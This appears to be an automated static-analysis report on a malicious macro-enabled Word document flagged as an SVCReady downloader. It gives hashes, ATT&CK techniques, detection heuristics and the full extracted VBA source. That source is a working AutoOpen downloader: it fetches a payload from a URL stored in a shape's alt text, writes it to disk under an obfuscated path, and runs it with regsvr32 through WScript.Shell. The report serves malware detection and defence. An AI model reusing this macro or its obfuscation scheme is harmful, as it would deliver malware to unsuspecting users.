Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 67f04eff930119f5…

MALICIOUS

Office (OOXML)

113.5 KB Created: 2020-07-20 08:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: b70c4066769b85e4a74ac8616940f15e SHA-1: 60df2017abad01de0a812c0065fe3e14634b170a SHA-256: 67f04eff930119f5a70814d008dd971e8a868e3bca17756fa07af254a802d0ba
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro utilizes WScript.Shell to execute a command, likely downloading and running a second-stage payload. The obfuscated string 'cb:7\8pbrdoeg8r9a1m5d1a5t6a2\7506d253d67.bj1pfgf' is passed to the exec function, indicating a downloaded payload. The presence of an external relationship to 'file:///C:\Framework\rels\builds\pack1\us.jpg' is also noted.

Heuristics 8

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    e2144357 ff24bb68(c11ee1b4), aaa1680c
Set cd52c2ab = CreateObject("wscript.shell")
Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    e2144357 ff24bb68(c11ee1b4), aaa1680c
Set cd52c2ab = CreateObject("wscript.shell")
Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub AutoOpen()
Dim da9de17f As New d9a57f13
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3405 bytes
SHA-256: 58a2e2719125c59e1663f8fdb23cc188245efcb91379810dbc303ae3cc31a702
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "c6ba3237"
Public Const c11ee1b4 As String = "cb:7\8pbrdoeg8r9a1m5d1a5t6a2\7506d253d67.bj1pfgf"
Function b95c28b3()
b95c28b3 = ActiveWindow.Visible
End Function
Function c24a9531()
c24a9531 = ActiveWindow.Parent
End Function
Sub AutoOpen()
Dim da9de17f As New d9a57f13
aaa = ff24bb68(dbbb5f26)
aaa1680c = da9de17f.c0937b2d(aaa, "")
e2144357 ff24bb68(c11ee1b4), aaa1680c
Set cd52c2ab = CreateObject("wscript.shell")
Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
End Sub

Attribute VB_Name = "d580001f"
Function cd44ba6d()
cd44ba6d = ActiveWindow.DisplayLeftScrollBar
End Function
Function f9342700()
f9342700 = Application.ActiveDocument.CurrentRsid
End Function
Sub e2144357(e393d48f, b6ab704d)
Dim eebd721b
eebd721b = FreeFile
Open e393d48f For Output As #eebd721b
Print #eebd721b, fa6c18a0(b6ab704d)
Close #eebd721b
End Sub
Function b3124bf4(ce31bb28, a0b00da4)
b3124bf4 = Mid(ce31bb28, a0b00da4, 1)
End Function
Function e912391b()
e912391b = Application.ActiveDocument.AutoHyphenation
End Function
Function a650ee96()
a650ee96 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function ff24bb68(b06a1bf6)
For a0b00da4 = 1 To Len(b06a1bf6) Step 2
ac5c4d59 = ac5c4d59 & b3124bf4(b06a1bf6, a0b00da4)
Next
ff24bb68 = ac5c4d59
End Function
Function cd9ba679()
cd9ba679 = 217
End Function
Function ef4a8c0a()
ef4a8c0a = ActiveWindow.WindowState
End Function
Sub b1a8861e()
End Sub
Function ed95979d()
ed95979d = ActiveWindow.Type
End Function
Function ec3fd99a()
ec3fd99a = ActiveWindow.DisplayScreenTips
End Function
Function fa6c18a0(b6ab704d)
fa6c18a0 = StrConv(b6ab704d, 64)
End Function
Function b6cce54c()
b6cce54c = ActiveWindow.Left
End Function
Function e08db292()
e08db292 = -66742202
End Function
Function dbbb5f26()
dbbb5f26 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a25c7873()
a25c7873 = ActiveWindow.Visible
End Function
Function d279417a(b443b024 As Long) As Long
Dim e6b6341b As Long
For e6b6341b = 11 To 68
b443b024 = b443b024 + e6b6341b
Next e6b6341b
d279417a = b443b024
End Function
Function d4ed51c9()
d4ed51c9 = ff24bb68("r7e1g0s0v6r93b29")
End Function

Attribute VB_Name = "d9a57f13"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function c5a50d13()
c5a50d13 = ActiveWindow.HorizontalPercentScrolled
End Function
Function ab96b2aa()
ab96b2aa = Application.ActiveDocument.ChartDataPointTrack
End Function
Function c0937b2d(b89ef127, fcee294c)
Dim bb14ae16 As Object
Set bb14ae16 = New MSXML2.XMLHTTP60
Call bb14ae16.Open("GET", b89ef127, False)
bb14ae16.Send
c0937b2d = bb14ae16.responsebody
End Function
Function c8a3c086()
c8a3c086 = Application.ActiveDocument.Content
End Function
Function ee6dd425()
ee6dd425 = Application.ActiveDocument.ActiveWindow
End Function
Function b5785f4e(f2a047cb)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 23552 bytes
SHA-256: 20d34bd9215d6a23d6e0b8395daff5906d1bc060076b2dce3c644673f2a41d7e

Open this report in the interactive analyzer, or submit your own file for analysis.